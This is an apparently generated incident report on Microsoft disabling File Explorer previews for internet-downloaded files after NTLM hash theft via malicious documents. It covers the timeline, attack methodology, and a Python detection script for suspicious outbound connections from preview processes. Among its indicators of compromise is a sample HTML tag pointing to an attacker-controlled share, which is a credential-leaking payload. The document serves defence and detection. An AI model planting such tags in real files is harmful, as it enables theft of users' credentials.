Full Report
Microsoft says that the File Explorer (formerly Windows Explorer) now automatically blocks previews for files downloaded from the Internet to block credential theft attacks via malicious documents. [...]
Analysis Summary
# Incident Report: File Explorer Preview Vulnerability Exploitation
## Executive Summary
Microsoft implemented a security measure that automatically disables the File Explorer preview pane for files carrying the Mark of the Web (MotW), i.e. files downloaded from the internet, after attacks were discovered in which an attacker could steal NTLM hashes. The change was a preventative response to an attack vector that required no user action beyond selecting the file in the preview pane, and it substantially reduces the risk of credential theft.
## Incident Details
- Discovery Date: Pre-October 2025 (implied, as the fix was released with the October 2025 updates)
- Incident Date: Attacks exploiting this vector were active leading up to October 2025.
- Affected Organization: All relevant Windows 11 and Windows Server installations utilizing the File Explorer preview pane.
- Sector: Technology/Software Distribution (Affecting all sectors using Windows).
- Geography: Global (Affecting users of Windows OS).
## Timeline of Events
### Initial Access
- Date/Time: Prior to October 2025 security updates.
- Vector: Malicious documents containing specific HTML tags (e.g., `<img>`, `<object>`, `<link>`) that reference external paths on attacker-controlled servers.
- Details: When a user selected the downloaded file in the File Explorer preview pane, these paths triggered communication to the attacker's server.
### Lateral Movement
- Not explicitly detailed as a result of this specific exploit; the immediate impact was credential theft.
### Data Exfiltration/Impact
- Data Exfiltration: NTLM hashes were leaked/stolen when the internal system reached out to the attacker-controlled server referenced in the malicious document's HTML tags.
- Impact: Loss of user credentials (NTLM hashes).
### Detection & Response
- Detection: Microsoft identified the vulnerability allowing NTLM hash leakage upon file preview.
- Response Actions: Microsoft released security updates starting October 2025 that automatically disable the File Explorer preview feature for MotW-marked files.
## Attack Methodology
- Initial Access: Placing malicious files on the internet (downloadable).
- Persistence: Not applicable for this specific vulnerability type. The exploitation was immediate upon preview.
- Privilege Escalation: Not applicable.
- Defense Evasion: Abused a legitimate OS function (the Preview Pane) to trigger outbound network requests without the user executing the file itself.
- Credential Access: Collection of NTLM hashes via forced network lookups initiated by the preview pane rendering engine.
- Discovery: Not applicable (Attack relied on pre-configured references within the file).
- Lateral Movement: Not applicable within the scope of this specific vulnerability report.
- Collection: NTLM hashes.
- Exfiltration: Hashes were sent to attacker-controlled external servers referenced in the file tags.
- Impact: Successful credential harvesting.
## Impact Assessment
- Financial: Not explicitly disclosed (Cost of remediation/patching, potential business impact from subsequent breaches).
- Data Breach: NTLM hashes (credentials). Volume/Scope depends on how often users previewed impacted files.
- Operational: Minimal operational impact for end-users, as the change was introduced via standard updates, though workflows requiring previewing untrusted documents were interrupted.
- Reputational: Minor reputational impact for Microsoft due to the discovery of a major credential leakage vector in a core OS feature.
## Indicators of Compromise
- Network indicators: Connections initiated to external servers when previewing MotW-marked files due to HTML tags referencing external paths (e.g., HTTP/SMB requests containing authentication attempts).
- File indicators: Files marked with Mark of the Web (MotW) containing specific HTML elements referencing external paths (e.g., those utilizing `<img src="\\attacker_share\log">`, or similar structures).
- Behavioral indicators: Unexpected outbound network traffic originating from File Explorer processes when a user simply selects a downloaded file in the preview pane.
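Detection logic for the behavioral and network indicators above, written as an added example and not taken from the original report. It runs over constructed Sysmon-style network-connection records; the internal address ranges, the documentation-range destination IPs, and the inclusion of prevhost.exe alongside explorer.exe are assumptions made for the example.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed Sysmon Event ID 3 style records (network connection); not real telemetry.
# Destination IPs use documentation ranges (RFC 5737) as stand-ins for attacker servers.
SAMPLE_EVENTS = [
    "EventID=3 Image=C:\\Windows\\explorer.exe DestinationIp=10.0.0.5 DestinationPort=445",
    "EventID=3 Image=C:\\Windows\\explorer.exe DestinationIp=203.0.113.7 DestinationPort=445",
    "EventID=3 Image=C:\\Windows\\System32\\prevhost.exe DestinationIp=198.51.100.9 DestinationPort=80",
    "EventID=3 Image=C:\\Windows\\explorer.exe DestinationIp=203.0.113.7 DestinationPort=53",
    "EventID=3 Image=C:\\Browser\\firefox.exe DestinationIp=198.51.100.9 DestinationPort=443",
    "EventID=1 Image=C:\\Windows\\explorer.exe CommandLine=explorer.exe",
]

# explorer.exe is named in the report; prevhost.exe (the preview-handler surrogate
# host) is added as an assumption so out-of-process preview handlers are covered too.
PREVIEW_IMAGES = {"explorer.exe", "prevhost.exe"}
# Ports carrying SMB or HTTP/WebDAV fetches on which an NTLM challenge can be answered.
AUTH_PORTS = {445, 80, 443}
# Address space treated as internal (assumed); anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> Dict[str, str]:
    # Split a "Key=Value Key=Value" record into a dict (sample values contain no spaces).
    return dict(FIELD_RE.findall(line))

def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def flag_preview_leaks(lines: List[str]) -> List[Dict[str, str]]:
    """Return connection events where a preview-pane process reaches an external
    host on a port that can carry an NTLM authentication attempt."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "3":          # only network-connection events
            continue
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image not in PREVIEW_IMAGES:       # only the processes that render previews
            continue
        if int(ev.get("DestinationPort", "0")) not in AUTH_PORTS:
            continue
        if is_external(ev.get("DestinationIp", "127.0.0.1")):
            hits.append(ev)
    return hits
```

On the sample data this flags the explorer.exe SMB connection to 203.0.113.7 and the prevhost.exe HTTP connection to 198.51.100.9, while internal SMB traffic, the DNS-port connection, and the browser's own traffic are ignored.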
## Response Actions
- Containment measures: Disabling the preview functionality in File Explorer for files flagged with MotW.
- Eradication steps: After the update, users who trust the source must manually "Unblock" the file via the Properties > General tab, or remove the file share from the Local Intranet or Trusted Sites zone.
- Recovery actions: Post-patch, ongoing monitoring for NTLM relay attempts originating from compromised systems.
## Lessons Learned
- Key takeaways: Reliance on benign user interaction (like using the preview pane) can be a significant attack vector, especially for credential theft (NTLM relay opportunity).
- What could have been done better: Security controls against credential leakage via native OS features (like previewing) should be robust by default, especially when handling external content.
## Recommendations
- Prevention measures for similar incidents: Ensure all systems utilize modern, secure authentication protocols (e.g., Kerberos over NTLM where possible). Implement enhanced logging and monitoring specifically for network activity triggered by the File Explorer process when viewing downloaded files. Review security hardening guides to disable/restrict features that automatically make external connections upon file interaction.